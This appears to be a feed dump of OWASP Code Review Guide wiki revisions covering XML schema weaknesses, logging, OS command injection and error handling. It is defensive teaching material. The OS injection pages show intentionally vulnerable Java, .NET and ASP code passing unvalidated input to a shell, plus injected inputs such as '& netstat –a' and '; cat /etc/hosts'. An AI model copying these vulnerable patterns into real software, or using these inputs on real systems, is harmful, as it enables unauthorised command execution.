Given that any number of elements can be supplied for an unbounded element, it is subject to attack via supplying the web service with vast amounts of elements, and hence a resource exhaustion issue.&lt;br /&gt;
&lt;br /&gt;
===Weak namespace, Global elements, the &amp;lt;any&amp;gt; element &amp;amp; SAX XML processors===&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;any&amp;gt; element can be used to make extensible documents, allowing documents to contain additional elements which are not declared in the main schema. The idea that an application can accept any number of parameters may be cause for alarm. This may lead to denial of availability or even in the case of a SAX XML parser legitimate values may be overwritten. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;cloud&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;process&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;lastcall&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;&lt;br /&gt;
      '''&amp;lt;xs:any minOccurs=&amp;quot;0&amp;quot;/&amp;gt;'''&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;any&amp;gt; element here permits additional parameters to be added in an arbitary manner. &lt;br /&gt;
&lt;br /&gt;
A namespace of ##any in the &amp;lt;any&amp;gt; element means the schema allows elements beyond what is explicitly defined in the schema, thereby reducing control on expected elements for a given request. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;xs:any namespace='##any' /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A schema that does not define restrictive element namespaces permits arbitrary elements to be included in a valid document, which may not be expected by the application. This may give rise to attacks, such as XML Injection, which consist of including tags which are not expected by the application.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_Logging_Issues&amp;diff=60796</id>
		<title>Reviewing Code for Logging Issues</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_Logging_Issues&amp;diff=60796"/>
				<updated>2009-05-15T10:17:50Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Log Storage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
=== In Brief===&lt;br /&gt;
Logging is the recording of information into storage that details who performed what and when they did it (like an audit trail). This can also cover debug messages implemented during development, as well as any messages reflecting problems or states within the application. It should be an audit of everything that the business deems important to track about the application’s use. Logging provides a detective method to ensure that the other security mechanisms being used are performing correctly. &lt;br /&gt;
&lt;br /&gt;
There are three categories of logs; application, operation system, and security software. While the general principles are similar for all logging needs, the practices stated in this document are especially applicable to application logs.&lt;br /&gt;
&lt;br /&gt;
A good logging strategy should include log generation, storage, protection, analysis, and reporting.&lt;br /&gt;
&lt;br /&gt;
====Log Generation====&lt;br /&gt;
Logging should be at least done at the following events:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Authentication''': Successful and unsuccessful attempts.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Authorization requests'''.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Data manipulation''': Any (CUD) Create, Update, Delete actions performed on the application.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Session activity''': Termination/Logout events.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The application should have the ability to detect and record possible malicious use, such as events that cause unexpected errors or defy the state model of the application, for example, users who attempt to get access to data that they shouldn’t, and incoming data that does not meet validation rules or has been tampered with. In general, it should detect any error condition which could not occur without an attempt by the user to circumvent the application logic.&lt;br /&gt;
Logging should give us the information required to form a proper audit trail of a user's actions.&lt;br /&gt;
&lt;br /&gt;
Leading from this, the date/time actions were performed would be useful, but make sure the application uses a clock that is synched to a common time source. Logging functionality should not log any personal or sensitive data pertaining to the user of function at hand that is being recorded; an example of this is if your application is accepting HTTP GET the payload is in the URL and the GET shall be logged. This may result in logging sensitive data.&lt;br /&gt;
&lt;br /&gt;
Logging should follow best practice regarding data validation; maximum length of information, malicious characters….&lt;br /&gt;
We should ensure that logging functionality only logs messages of a reasonable length and that this length is enforced.&lt;br /&gt;
Never log user input directly; validate, then log. &lt;br /&gt;
&lt;br /&gt;
====Log Storage====&lt;br /&gt;
In order to preserve log entries and keep the sizes of log files manageable, log rotation is recommended. Log rotation means closing a log file and opening a new one when the first file is considered to be either complete or becoming too big. Log rotation is typically performed according to a schedule (e.g. daily) or when a file reaches a certain size.&lt;br /&gt;
&lt;br /&gt;
====Log Protection====&lt;br /&gt;
Because logs contain records of user account and other sensitive information, they need to be protected from breaches of their confidentiality, integrity, and availability, the triad of information security.&lt;br /&gt;
&lt;br /&gt;
====Log Analysis and Reporting====&lt;br /&gt;
Log analysis is the studying of log entries to identify events of interest or suppress log entries for insignificant events. Log reporting is the displaying of log analysis. Although these are normally the responsibilities of the system administrator, an application must generate logs that are consistent and contain info that will allow the administrator to prioritize the records. Logging should create an audit of system events and  also be time stamped in GMT as not to create confusion. In the course of reviewing logging transactional events such as Create, Update, or Delete (CUD), business execution such as data transfer and also security events should be logged.&lt;br /&gt;
&lt;br /&gt;
===Common open source logging solutions===&lt;br /&gt;
&lt;br /&gt;
Log4J:		 http://logging.apache.org/log4j/docs/index.html&lt;br /&gt;
&lt;br /&gt;
Log4net:	 http://logging.apache.org/log4net/&lt;br /&gt;
&lt;br /&gt;
Commons Logging: http://jakarta.apache.org/commons/logging/index.html&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In Tomcat(5.5), if no custom logger is defined (log4J) then everything is logged via Commons Logging and ultimately ends up in catalina.out.&lt;br /&gt;
catalina.out grows endlessly and does not recycle/rollover. Log4J provides “Rollover” functionality, which limits the size of the log. Log4J also gives the option to specify “appenders” which can redirect the log data to other destinations such as a port, syslog, or even a database or JMS. &lt;br /&gt;
&lt;br /&gt;
The parts of log4J which should be considered apart from the actual data being logged by the application are contained in the log4j.properties file: &lt;br /&gt;
&lt;br /&gt;
 #&lt;br /&gt;
 # Configures Log4j as the Tomcat system logger&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configure the logger to output info level messages into a rolling log file.&lt;br /&gt;
 #&lt;br /&gt;
 log4j.rootLogger=INFO, R&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # To continue using the &amp;quot;catalina.out&amp;quot; file (which grows forever),&lt;br /&gt;
 # comment out the above line and uncomment the next.&lt;br /&gt;
 #&lt;br /&gt;
 #log4j.rootLogger=ERROR, A1&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configuration for standard output (&amp;quot;catalina.out&amp;quot;).&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.A1=org.apache.log4j.ConsoleAppender&lt;br /&gt;
 log4j.appender.A1.layout=org.apache.log4j.PatternLayout&lt;br /&gt;
 #&lt;br /&gt;
 # Print the date in ISO 8601 format&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.A1.layout.ConversionPattern=%d [%t] %-5p %c - %m%n&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configuration for a rolling log file (&amp;quot;tomcat.log&amp;quot;).&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R=org.apache.log4j.DailyRollingFileAppender&lt;br /&gt;
 log4j.appender.R.DatePattern='.'yyyy-MM-dd&lt;br /&gt;
 #&lt;br /&gt;
 # Edit the next line to point to your logs directory.&lt;br /&gt;
 # The last part of the name is the log file name.&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R.File=/usr/local/tomcat/logs/tomcat.log&lt;br /&gt;
 log4j.appender.R.layout=org.apache.log4j.PatternLayout&lt;br /&gt;
 #&lt;br /&gt;
 # Print the date in ISO 8601 format&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R.layout.ConversionPattern=%d [%t] %-5p %c - %m%n&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Application logging options&lt;br /&gt;
 #&lt;br /&gt;
 #log4j.logger.org.apache=DEBUG&lt;br /&gt;
 #log4j.logger.org.apache=INFO&lt;br /&gt;
 #log4j.logger.org.apache.struts=DEBUG&lt;br /&gt;
 #log4j.logger.org.apache.struts=INFO&lt;br /&gt;
&lt;br /&gt;
==Vulnerable patterns examples for Logging==&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
The following are issues one may look out for or question the development/deployment team. Logging and auditing are detective methods of fraud prevention. They are much overlooked in the industry, which enables attackers to continue to attack/commit fraud without being detected. &lt;br /&gt;
&lt;br /&gt;
They cover Windows and .NET issues.&lt;br /&gt;
&lt;br /&gt;
'''Check that:'''&lt;br /&gt;
#Windows native log puts a timestamp on all log entries.&lt;br /&gt;
#GMT is set as the default time.&lt;br /&gt;
#The Windows operating system can be configured to use network timeservers.&lt;br /&gt;
#By default the event log will show the name of the computer that generated the event and the application in the source field of the viewer. Additional information such as request identifier, username, and destination should be included in the body of the error event. &lt;br /&gt;
#No sensitive or business critical information is sent to the application logs.&lt;br /&gt;
#Application logs are not located in the web root directory.&lt;br /&gt;
#Log policy allows different levels of log severity.&lt;br /&gt;
&lt;br /&gt;
===Writing to the Event Log===&lt;br /&gt;
In the course of reviewing .NET code ensure that calls the EventLog object do not provide any confidential information. &lt;br /&gt;
&lt;br /&gt;
 EventLog.WriteEntry( &amp;quot;&amp;lt;password&amp;gt;&amp;quot;,EventLogEntryType.Information);&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
You can add events to Web server Log or Windows log, for Web Server Log use. &lt;br /&gt;
&lt;br /&gt;
 Response.AppendToLog(&amp;quot;Error in Processing&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
This is the common way of adding entries to the Windows event log. &lt;br /&gt;
&lt;br /&gt;
 Const EVENT_SUCCESS = 0&lt;br /&gt;
 Set objShell = Wscript.CreateObject(&amp;quot;Wscript.Shell&amp;quot;)&lt;br /&gt;
 objShell.LogEvent EVENT_SUCCESS, _&lt;br /&gt;
   &amp;quot;Payroll application successfully installed.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Notice all the previous bullets for ASP.NET are pretty much applicable for classic ASP as well. &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60240</id>
		<title>Reviewing Code for OS Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60240"/>
				<updated>2009-05-06T17:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Injection flaws allow attackers to pass malicious code through a web application to another subsystem. Depending on the subsystem, different types of injection attacks can be performed: &lt;br /&gt;
&lt;br /&gt;
RDBMS: SQL Injection&amp;lt;br&amp;gt;&lt;br /&gt;
WebBrowser/Appserver: SQL Injection&amp;lt;br&amp;gt;&lt;br /&gt;
OS-shell: Operating system commands Calling external applications from your application.&lt;br /&gt;
&lt;br /&gt;
OS Commanding is one of the attack classes that fall into [http://www.webappsec.org/projects/threat/classes/os_commanding.shtml Injection Flaws]. In other classifications, it is placed in [http://www.fortify.com/vulncat/index.html Input Validation and Representation] [[Category:FIXME|link not working]]category, [[Top_10_2007-A2|OS Commanding]] threat class or defined as [http://cwe.mitre.org/data/definitions/77.html Failure to Sanitize Data into Control Plane] weakness and [http://capec.mitre.org/data/definitions/6.html Argument Injection] attack pattern enumeration. OS Commanding happens when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or arguments) without validation or a proper escaping.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable code ==&lt;br /&gt;
Many developers believe text fields are the only areas for data validation. This is an incorrect assumption. Any external input must be data validated: &lt;br /&gt;
&lt;br /&gt;
Text fields, List boxes, radio buttons, check boxes, cookies, HTTP header data, HTTP post data, hidden fields, parameter names and parameter values. … This is not an exhaustive list. &lt;br /&gt;
&lt;br /&gt;
“Process to process” or “entity-to-entity” communication must be investigated also. Any code that communicates with an upstream or downstream process and accepts input from it must be reviewed. &lt;br /&gt;
&lt;br /&gt;
All injection flaws are input-validation errors. The presence of an injection flaw is an indication of incorrect data validation on the input received from an external source outside the boundary of trust, which gets more blurred every year. &lt;br /&gt;
&lt;br /&gt;
Basically for this type of vulnerability we need to find all input streams into the application. This can be from a user’s browser, CLI or fat client but also from upstream processes that “feed” our application. &lt;br /&gt;
&lt;br /&gt;
An example would be to search the code base for the use of APIs or packages that are normally used for communication purposes. &lt;br /&gt;
&lt;br /&gt;
The '''java.io''', '''java.sql''', '''java.net''', '''java.rmi''', '''java.xml''' packages are all used for application communication. Searching for methods from those packages in the code base can yield results. A less “scientific” method is to search for common keywords such as “UserID”, “LoginID” or “Password”.&lt;br /&gt;
&lt;br /&gt;
== Vulnerable Patterns for OS Injection ==&lt;br /&gt;
What we should be looking for are relationships between the application and the operating system; the application-utilising functions of the underlying operating system. &lt;br /&gt;
&lt;br /&gt;
In Java using the Runtime object, '''java.lang.Runtime''' does this.&lt;br /&gt;
In .NET calls such as '''System.Diagnostics.Process.Start '''are used to call underlying OS functions. &lt;br /&gt;
In PHP we may look for calls such as '''exec()''' or '''passthru()'''.&lt;br /&gt;
&lt;br /&gt;
'''Example''':&lt;br /&gt;
&lt;br /&gt;
We have a class that eventually gets input from the user via a HTTP request. This class is used to execute some native exe on the application server and return a result. &lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
 public string executeCommand(String userName)&lt;br /&gt;
 {	try {&lt;br /&gt;
 		String myUid = userName;&lt;br /&gt;
 		Runtime rt = Runtime.getRuntime();&lt;br /&gt;
 		rt.exec(&amp;quot;'''''cmd.exe /C''''' doStuff.exe &amp;quot; +”-“ +myUid); // Call exe with userID&lt;br /&gt;
 	}catch(Exception e)&lt;br /&gt;
 		{&lt;br /&gt;
 e.printStackTrace();&lt;br /&gt;
 		}&lt;br /&gt;
 	}&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The method executeCommand calls '''''doStuff.exe''''' (utilizing cmd.exe) via the '''''java.lang.runtime''''' static method '''''getRuntime()'''''. The parameter passed is not validated in any way in this class. We are assuming that the data has not been data validated prior to calling this method. ''Transactional analysis should have encountered any data validation prior to this point.''&lt;br /&gt;
Inputting “Joe69” would result in the following MS DOS command:&lt;br /&gt;
&lt;br /&gt;
'''''doStuff.exe –Joe69'''''&lt;br /&gt;
&lt;br /&gt;
Lets say we input '''''Joe69 &amp;amp; netstat –a''''' we would get the following response:&lt;br /&gt;
&lt;br /&gt;
The exe doStuff would execute passing in the User Id Joe69, but then the DOS command '''''netstat''''' would be called. How this works is the passing of the parameter “&amp;amp;” into the application, which in turn is used as a command appender in MS DOS and hence the command after the &amp;amp; character is executed. &lt;br /&gt;
&lt;br /&gt;
This wouldn't be true, if the code above was written as (here we assume that '''''doStuff.exe''''' doesn't act as an command interpreter, such as cmd.exe or /bin/sh);&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
 public string executeCommand(String userName)&lt;br /&gt;
 {	try {&lt;br /&gt;
 		String myUid = userName;&lt;br /&gt;
 		Runtime rt = Runtime.getRuntime();&lt;br /&gt;
 		rt.exec(&amp;quot;doStuff.exe &amp;quot; +”-“ +myUid); // Call exe with userID&lt;br /&gt;
 	}catch(Exception e)&lt;br /&gt;
 		{&lt;br /&gt;
 e.printStackTrace();&lt;br /&gt;
 		}&lt;br /&gt;
 	}&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Why? From [http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Runtime.html Java 2 documentation];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'' ... More precisely, the given command string is broken into tokens using a StringTokenizer created by the call new StringTokenizer(command) with no further modification of the character categories. The tokens produced by the tokenizer are then placed in the new string array cmdarray, in the same order ... ''&lt;br /&gt;
&lt;br /&gt;
The produced array contains the executable (the first item) to call and its arguments (the rest of the arguments). So, unless the first item to be called is an application which parses the arguments and interprets them, and further calls other external applications according to them, it wouldn't be possible to execute  '''''netstat''''' in the above code snippet. Such a first item to be called would be '''''cmd.exe''''' in Windows boxes or '''''sh''''' in Unix-like boxes.&lt;br /&gt;
&lt;br /&gt;
Most of the out-of-box source code/assembly analyzers would (and some wouldn't!) flag a ''Command Execution'' issue when they encounter the dangerous APIs; '''''System.Diagnostics.Process.Start''''', '''''java.lang.Runtime.exec'''''. However, obviously, the calculated risk should differ. In the first example, the &amp;quot;command injection&amp;quot; is there, whereas, in the second one without any validation nor escaping what can be called as &amp;quot;argument injection&amp;quot; vulnerability exists. The risk is still there, but the severity depends on the command being called. So, the issue needs analysis. &lt;br /&gt;
&lt;br /&gt;
===UNIX===&lt;br /&gt;
&lt;br /&gt;
An attacker might insert the string '''“; cat /etc/hosts”''' and the contents of the UNIX hosts file might be exposed to the attacker if the command is executed through a shell such as /bin/bash or /bin/sh. &lt;br /&gt;
&lt;br /&gt;
===.NET Example===&lt;br /&gt;
 namespace ExternalExecution&lt;br /&gt;
 {&lt;br /&gt;
 class CallExternal&lt;br /&gt;
 {&lt;br /&gt;
 static void Main(string[] args)&lt;br /&gt;
 {&lt;br /&gt;
 String arg1=args[0];&lt;br /&gt;
 System.Diagnostics.Process.Start(&amp;quot;doStuff.exe&amp;quot;, arg1);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Yet again there is no data validation to speak of here, assuming that there is no upstream validation occurring in another class. &lt;br /&gt;
&lt;br /&gt;
===Classic ASP Example===&lt;br /&gt;
 &amp;lt;pre&amp;gt;&lt;br /&gt;
 &amp;lt;% &lt;br /&gt;
   option explicit&lt;br /&gt;
   dim wshell&lt;br /&gt;
   set wshell = CreateObject(&amp;quot;WScript.Shell&amp;quot;) &lt;br /&gt;
   wshell.run &amp;quot;c:\file.bat &amp;quot; &amp;amp; Request.Form(&amp;quot;Args&amp;quot;)&lt;br /&gt;
   set wshell = nothing &lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e. SQL injection). Complete scripts written in Perl, Python, shell, bat, and other languages can be injected into poorly designed web applications and executed.&lt;br /&gt;
&lt;br /&gt;
==Good Patterns &amp;amp; procedures to prevent OS injection==&lt;br /&gt;
&lt;br /&gt;
See the Data Validation section.&lt;br /&gt;
&lt;br /&gt;
==Related Articles==&lt;br /&gt;
[[Command Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Interpreter Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
[[Category:Input Validation]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60235</id>
		<title>Reviewing Code for OS Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60235"/>
				<updated>2009-05-06T17:14:51Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Injection flaws allow attackers to pass malicious code through a web application to another subsystem. Depending on the subsystem, different types of injection attacks can be performed: &lt;br /&gt;
&lt;br /&gt;
RDBMS: SQL Injection&amp;lt;br&amp;gt;&lt;br /&gt;
WebBrowser/Appserver: SQL Injection&amp;lt;br&amp;gt;&lt;br /&gt;
OS-shell: Operating system commands Calling external applications from your application.&lt;br /&gt;
&lt;br /&gt;
OS Commanding is one of the attack classes that fall into [http://www.webappsec.org/projects/threat/classes/os_commanding.shtml Injection Flaws]. In other classifications, it is placed in [http://www.fortify.com/vulncat/index.html Input Validation and Representation] category, [[Top_10_2007-A2|OS Commanding]] threat class or defined as [http://cwe.mitre.org/data/definitions/77.html Failure to Sanitize Data into Control Plane] weakness and [http://capec.mitre.org/data/definitions/6.html Argument Injection] attack pattern enumeration. OS Commanding happens when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or arguments) without validation or a proper escaping.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable code ==&lt;br /&gt;
Many developers believe text fields are the only areas for data validation. This is an incorrect assumption. Any external input must be data validated: &lt;br /&gt;
&lt;br /&gt;
Text fields, List boxes, radio buttons, check boxes, cookies, HTTP header data, HTTP post data, hidden fields, parameter names and parameter values. … This is not an exhaustive list. &lt;br /&gt;
&lt;br /&gt;
“Process to process” or “entity-to-entity” communication must be investigated also. Any code that communicates with an upstream or downstream process and accepts input from it must be reviewed. &lt;br /&gt;
&lt;br /&gt;
All injection flaws are input-validation errors. The presence of an injection flaw is an indication of incorrect data validation on the input received from an external source outside the boundary of trust, which gets more blurred every year. &lt;br /&gt;
&lt;br /&gt;
Basically for this type of vulnerability we need to find all input streams into the application. This can be from a user’s browser, CLI or fat client but also from upstream processes that “feed” our application. &lt;br /&gt;
&lt;br /&gt;
An example would be to search the code base for the use of APIs or packages that are normally used for communication purposes. &lt;br /&gt;
&lt;br /&gt;
The '''java.io''', '''java.sql''', '''java.net''', '''java.rmi''', '''java.xml''' packages are all used for application communication. Searching for methods from those packages in the code base can yield results. A less “scientific” method is to search for common keywords such as “UserID”, “LoginID” or “Password”.&lt;br /&gt;
&lt;br /&gt;
== Vulnerable Patterns for OS Injection ==&lt;br /&gt;
What we should be looking for are relationships between the application and the operating system; the application-utilising functions of the underlying operating system. &lt;br /&gt;
&lt;br /&gt;
In Java using the Runtime object, '''java.lang.Runtime''' does this.&lt;br /&gt;
In .NET calls such as '''System.Diagnostics.Process.Start '''are used to call underlying OS functions. &lt;br /&gt;
In PHP we may look for calls such as '''exec()''' or '''passthru()'''.&lt;br /&gt;
&lt;br /&gt;
'''Example''':&lt;br /&gt;
&lt;br /&gt;
We have a class that eventually gets input from the user via a HTTP request. This class is used to execute some native exe on the application server and return a result. &lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
 public string executeCommand(String userName)&lt;br /&gt;
 {	try {&lt;br /&gt;
 		String myUid = userName;&lt;br /&gt;
 		Runtime rt = Runtime.getRuntime();&lt;br /&gt;
 		rt.exec(&amp;quot;'''''cmd.exe /C''''' doStuff.exe &amp;quot; +”-“ +myUid); // Call exe with userID&lt;br /&gt;
 	}catch(Exception e)&lt;br /&gt;
 		{&lt;br /&gt;
 e.printStackTrace();&lt;br /&gt;
 		}&lt;br /&gt;
 	}&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The method executeCommand calls '''''doStuff.exe''''' (utilizing cmd.exe) via the '''''java.lang.runtime''''' static method '''''getRuntime()'''''. The parameter passed is not validated in any way in this class. We are assuming that the data has not been data validated prior to calling this method. ''Transactional analysis should have encountered any data validation prior to this point.''&lt;br /&gt;
Inputting “Joe69” would result in the following MS DOS command:&lt;br /&gt;
&lt;br /&gt;
'''''doStuff.exe –Joe69'''''&lt;br /&gt;
&lt;br /&gt;
Lets say we input '''''Joe69 &amp;amp; netstat –a''''' we would get the following response:&lt;br /&gt;
&lt;br /&gt;
The exe doStuff would execute passing in the User Id Joe69, but then the DOS command '''''netstat''''' would be called. How this works is the passing of the parameter “&amp;amp;” into the application, which in turn is used as a command appender in MS DOS and hence the command after the &amp;amp; character is executed. &lt;br /&gt;
&lt;br /&gt;
This wouldn't be true, if the code above was written as (here we assume that '''''doStuff.exe''''' doesn't act as an command interpreter, such as cmd.exe or /bin/sh);&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
 public string executeCommand(String userName)&lt;br /&gt;
 {	try {&lt;br /&gt;
 		String myUid = userName;&lt;br /&gt;
 		Runtime rt = Runtime.getRuntime();&lt;br /&gt;
 		rt.exec(&amp;quot;doStuff.exe &amp;quot; +”-“ +myUid); // Call exe with userID&lt;br /&gt;
 	}catch(Exception e)&lt;br /&gt;
 		{&lt;br /&gt;
 e.printStackTrace();&lt;br /&gt;
 		}&lt;br /&gt;
 	}&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Why? From [http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Runtime.html Java 2 documentation];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'' ... More precisely, the given command string is broken into tokens using a StringTokenizer created by the call new StringTokenizer(command) with no further modification of the character categories. The tokens produced by the tokenizer are then placed in the new string array cmdarray, in the same order ... ''&lt;br /&gt;
&lt;br /&gt;
The produced array contains the executable (the first item) to call and its arguments (the rest of the arguments). So, unless the first item to be called is an application which parses the arguments and interprets them, and further calls other external applications according to them, it wouldn't be possible to execute  '''''netstat''''' in the above code snippet. Such a first item to be called would be '''''cmd.exe''''' in Windows boxes or '''''sh''''' in Unix-like boxes.&lt;br /&gt;
&lt;br /&gt;
Most of the out-of-box source code/assembly analyzers would (and some wouldn't!) flag a ''Command Execution'' issue when they encounter the dangerous APIs; '''''System.Diagnostics.Process.Start''''', '''''java.lang.Runtime.exec'''''. However, obviously, the calculated risk should differ. In the first example, the &amp;quot;command injection&amp;quot; is there, whereas, in the second one without any validation nor escaping what can be called as &amp;quot;argument injection&amp;quot; vulnerability exists. The risk is still there, but the severity depends on the command being called. So, the issue needs analysis. &lt;br /&gt;
&lt;br /&gt;
===UNIX===&lt;br /&gt;
&lt;br /&gt;
An attacker might insert the string '''“; cat /etc/hosts”''' and the contents of the UNIX hosts file might be exposed to the attacker if the command is executed through a shell such as /bin/bash or /bin/sh. &lt;br /&gt;
&lt;br /&gt;
===.NET Example===&lt;br /&gt;
 namespace ExternalExecution&lt;br /&gt;
 {&lt;br /&gt;
 class CallExternal&lt;br /&gt;
 {&lt;br /&gt;
 static void Main(string[] args)&lt;br /&gt;
 {&lt;br /&gt;
 String arg1=args[0];&lt;br /&gt;
 System.Diagnostics.Process.Start(&amp;quot;doStuff.exe&amp;quot;, arg1);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Yet again there is no data validation to speak of here, assuming that there is no upstream validation occurring in another class. &lt;br /&gt;
&lt;br /&gt;
===Classic ASP Example===&lt;br /&gt;
 &amp;lt;pre&amp;gt;&lt;br /&gt;
 &amp;lt;% &lt;br /&gt;
   option explicit&lt;br /&gt;
   dim wshell&lt;br /&gt;
   set wshell = CreateObject(&amp;quot;WScript.Shell&amp;quot;) &lt;br /&gt;
   wshell.run &amp;quot;c:\file.bat &amp;quot; &amp;amp; Request.Form(&amp;quot;Args&amp;quot;)&lt;br /&gt;
   set wshell = nothing &lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e. SQL injection). Complete scripts written in Perl, Python, shell, bat, and other languages can be injected into poorly designed web applications and executed.&lt;br /&gt;
&lt;br /&gt;
==Good Patterns &amp;amp; procedures to prevent OS injection==&lt;br /&gt;
&lt;br /&gt;
See the Data Validation section.&lt;br /&gt;
&lt;br /&gt;
==Related Articles==&lt;br /&gt;
[[Command Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Interpreter Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
[[Category:Input Validation]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60156</id>
		<title>Codereview-Error-Handling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60156"/>
				<updated>2009-05-05T12:11:40Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Web.config */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
==Error Handling==&lt;br /&gt;
Error Handling is important in a number of ways. It may affect the state of the application, or leak system information to a user. The initial failure to cause the error may cause the application to traverse into an insecure state. Weak error handling also aids the attacker, as the errors returned may assist them in constructing correct attack vectors. A generic error page for most errors is recommended when developing code. This approach makes it more difficult for attackers to identify signatures of potentially successful attacks. There are methods which can circumvent systems with leading practice error handling semantics which should be kept in mind; Attacks such as blind SQL injection using booleanization or response time characteristics can be used to address such generic responses. &lt;br /&gt;
&lt;br /&gt;
